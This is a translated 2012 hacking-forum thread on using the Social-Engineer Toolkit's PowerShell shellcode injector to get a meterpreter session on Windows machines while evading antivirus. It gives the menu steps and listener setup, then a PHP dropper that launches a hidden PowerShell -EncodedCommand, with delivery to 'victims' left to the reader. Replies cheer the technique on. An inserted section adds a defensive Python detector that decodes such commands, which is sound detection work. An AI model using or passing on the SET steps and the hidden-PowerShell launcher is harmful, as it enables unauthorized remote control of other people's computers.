Indonesian Back|Track Team
SET : Powershell, Bypass AV - Printable Version



SET : Powershell, Bypass AV - u5h4nt - 08-29-2012

Assalamualaikum, good morning everyone.
It's been a while since I wrote a thread .. hehehe

This time I just want to share a bit of info on how to pwn a Windows machine (almost every current Windows version) without being detected by any antivirus (insyaallah; I only tested it against Avast Pro, hehehe).
Usually, to do exploitation, we first use a backdoor to get access to the target system, but it takes a little (a lot of) skill with backdoors to make one stealthy enough that the AV doesn't smell it, which is why so many backdoors meet a tragic end at the hands of top-tier AVs ..

This time we'll try another, simpler way: PowerShell, which is present in almost every current Windows version. Let's fire up SET right away ..

Choose 1) Social-Engineering Attacks

Choose 10) Powershell Attack Vectors

Choose 1) Powershell Alphanumeric Shellcode Injector

Enter the IP address and port we'll use for listening; after SET has generated the payload, start the listener (choose YES), then choose the target machine's architecture (x64 = 64-bit / x86 = 32-bit)
[Image: Screenshotfrom2012-08-29044233.png]

Once the payload listener is up, SET will have generated text files located in
Code:
[root@rrsatudua powershell]# pwd
/home/rr12/Applications/set/reports/powershell
[root@rrsatudua powershell]# ls
powershell.rc  x64_powershell_injection.txt  x86_powershell_injection.txt

Since my target is Windows 7 x86, I pick x86_powershell_injection.txt

Next, paste the contents of that file into the Windows command prompt (cmd.exe) and hit enter
[Image: 1.png]

and we immediately get a meterpreter session on the target machine.
[Image: Screenshotfrom2012-08-29044706.png]

[Image: Screenshotfrom2012-08-29050102.png]

[Image: Screenshotfrom2012-08-29044736.png]

Done, hehehe. Just season it with a little more creativity to support this trick .. think outside the box, as they say ..
Code:
My setup:
Fedora 17
[root@rrsatudua set]# uname -a
Linux rrsatudua 3.5.2-3.fc17.i686 #1 SMP Tue Aug 21 19:48:20 UTC 2012 i686 i686 i386 GNU/Linux
SET version : 3.7.1 (last update)

Reference : http://vimeo.com/14581715 [DEFCON 18 : Penetration testing on Powershell by Dave Kennedy]

That's all from me .. hopefully it's useful for all of us ..
bonus

[Image: header.jpg]




RE: SET : Powershell, Bypass AV - iKONspirasi - 08-29-2012

Walaikumsalam, wow, RR12 bro is writing threads again

Windows PowerShell has been present in all Windows versions since 2009, so it can indeed be applied to any Windows OS. The platform it uses is .NET

So we make a batch file to exec the powershell.txt file on the victim's PC, right? Hmm, this should be easy since the AV doesn't detect it.... scary, RR12 bro, good job

+2 from me



RE: SET : Powershell, Bypass AV - u5h4nt - 08-29-2012

(08-29-2012, 06:14 AM)konspirasi Wrote: Walaikumsalam, wow, RR12 bro is writing threads again

Windows PowerShell has been present in all Windows versions since 2009, so it can indeed be applied to any Windows OS. The platform it uses is .NET

So we make a batch file to exec the powershell.txt file on the victim's PC, right? Hmm, this should be easy since the AV doesn't detect it.... scary, RR12 bro, good job

+2 from me

Wow, thanks iKons bro, hopefully it can be developed further ...


Besides making a bat file, a web-based route should work too; just make a PHP file,
for example ..
Code:
<?php
// The base64 argument to -EncodedCommand was removed from the original post.
system("cmd /c powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand 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");
?>

How you get that file opened on the target machine is up to you ..
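Added here from the defender's side, and not part of the original thread: a small Python detector that flags process-creation records carrying the same launch flags as the command line above (hidden window, no profile, non-interactive, -EncodedCommand) and decodes the UTF-16LE base64 argument so an analyst can read what was run. The `CommandLine:` record layout, the log lines and the encoded sample script are all constructed for this example.

```python
import base64
import re

# Constructed sample script body, encoded the way -EncodedCommand expects
# (UTF-16LE, then base64); harmless and not from the original post.
SAMPLE_ENCODED = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode("ascii")

# Constructed process-creation records (flattened "CommandLine: ..." text). The
# second mirrors the flag combination in the PHP snippet; the others are benign.
SAMPLE_LOGS = [
    "CommandLine: notepad.exe C:\\Users\\alice\\notes.txt",
    "CommandLine: cmd /c powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " + SAMPLE_ENCODED,
    "CommandLine: powershell.exe -File C:\\Scripts\\backup.ps1",
]

# powershell.exe accepts any unambiguous prefix of a parameter name, so each
# pattern also covers the short forms (-enc, -e, -w hidden, -nop, -noni).
_INDICATORS = {
    "EncodedCommand": re.compile(r"-(?:enc\w*|ec|e)\b", re.I),
    "WindowStyle hidden": re.compile(r"-w(?:in\w*)?\s+h(?:idden)?\b", re.I),
    "NoProfile": re.compile(r"-nop\w*", re.I),
    "NonInteractive": re.compile(r"-noni\w*", re.I),
}
_B64_AFTER_FLAG = re.compile(r"-(?:enc\w*|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    # The token after the flag is base64 of UTF-16LE text; None if absent or malformed.
    m = _B64_AFTER_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_command_line(cmdline):
    is_ps = re.search(r"\bpowershell(?:\.exe)?\b", cmdline, re.I) is not None
    hits = [name for name, rx in _INDICATORS.items() if is_ps and rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline) if "EncodedCommand" in hits else None
    # Alert on any encoded command, or on two or more stealth flags together.
    suspicious = is_ps and ("EncodedCommand" in hits or len(hits) >= 2)
    return {"suspicious": suspicious, "indicators": hits, "decoded": decoded}

def scan_logs(lines):
    # Returns (command line, analysis) for each record that trips the rule.
    findings = []
    for line in lines:
        cmd = line.split("CommandLine:", 1)[-1].strip()
        result = analyze_command_line(cmd)
        if result["suspicious"]:
            findings.append((cmd, result))
    return findings
```

Feeding real Sysmon Event ID 1 or Windows 4688 command lines through `scan_logs` works the same way once each record is flattened to a `CommandLine:` field; the decoded text is what you would triage, since the base64 itself tells you nothing.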


RE: SET : Powershell, Bypass AV - Udalah - 08-29-2012

Nice share bro, +1 for now; I'll develop it further, bro


RE: SET : Powershell, Bypass AV - bee1k - 08-29-2012

Great thread
Bookmarking it for now bro, I'll study it later



RE: SET : Powershell, Bypass AV - kuch1k1 - 08-29-2012

Really nice thread, bro,,.....
Need to head to the scene for this one

Off to go try it


RE: SET : Powershell, Bypass AV - u5h4nt - 08-29-2012

Yes, everyone please try it. If you find something new, share it too


RE: SET : Powershell, Bypass AV - Al - Ayyubi - 08-29-2012

Thanks for the share, RR12 bro
When you do share, it's really awesome
Let me try it too, bro


RE: SET : Powershell, Bypass AV - bunglonhijau - 08-30-2012

Finally.. writing again; I'll try it out first, mas.. nice share


+1


RE: SET : Powershell, Bypass AV - betefive - 08-30-2012

Awesome.... I wanted to give +100 but can't, bro,, so just thanks,, ehehehehehe